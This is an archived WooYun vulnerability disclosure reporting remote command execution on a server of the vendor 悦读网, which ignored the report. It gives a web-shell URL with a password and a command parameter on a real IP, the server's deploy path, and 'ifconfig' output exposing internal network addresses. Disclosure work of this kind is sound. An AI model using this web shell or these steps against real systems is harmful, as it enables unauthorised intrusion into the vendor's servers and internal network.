当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0168560

漏洞标题:悦读网远程执行漏洞影响(影响内网与用户下载)

相关厂商:悦读网

漏洞作者: 路人甲

提交时间:2016-01-09 21:38

修复时间:2016-01-14 21:40

公开时间:2016-01-14 21:40

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-09: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞存在

1.jpg


执行命令:http://42.62.53.93/is/cmd.jsp?pwd=023&cmd=uname -a

2.jpg


漏洞证明:


下载地址:http://www.zubunet.com/site/download_software.jsp#down_pc
物理路径 :/opt/jboss-download/server/default/deploy/mag-delivery.war/

3.jpg


4.jpg


在内网:
[/opt/jboss-download/server/default/./tmp/deploy/tmp1602602391040436775is-exp.war/]$ ifconfig -a
eth0 Link encap:Ethernet HWaddr 78:2B:CB:2F:AE:35
inet addr:192.168.20.14 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::7a2b:cbff:fe2f:ae35/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:85357530 errors:0 dropped:0 overruns:0 frame:0
TX packets:186283670 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3891377419 (3.6 GiB) TX bytes:3751352284 (3.4 GiB)
Interrupt:106 Memory:d6000000-d6012800
eth1 Link encap:Ethernet HWaddr 78:2B:CB:2F:AE:37
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:114 Memory:d8000000-d8012800
eth2 Link encap:Ethernet HWaddr 78:2B:CB:2F:AE:39
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:122 Memory:da000000-da012800
eth3 Link encap:Ethernet HWaddr 78:2B:CB:2F:AE:3B
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:130 Memory:dc000000-dc012800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:305846 errors:0 dropped:0 overruns:0 frame:0
TX packets:305846 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1604269668 (1.4 GiB) TX bytes:1604269668 (1.4 GiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
确定是悦读网。
现在下载换到了http://42.62.53.83
这个应该是之前的老站了。不过在内网,应该内网安全。之前的漏洞没有修复。

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-01-14 21:40

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无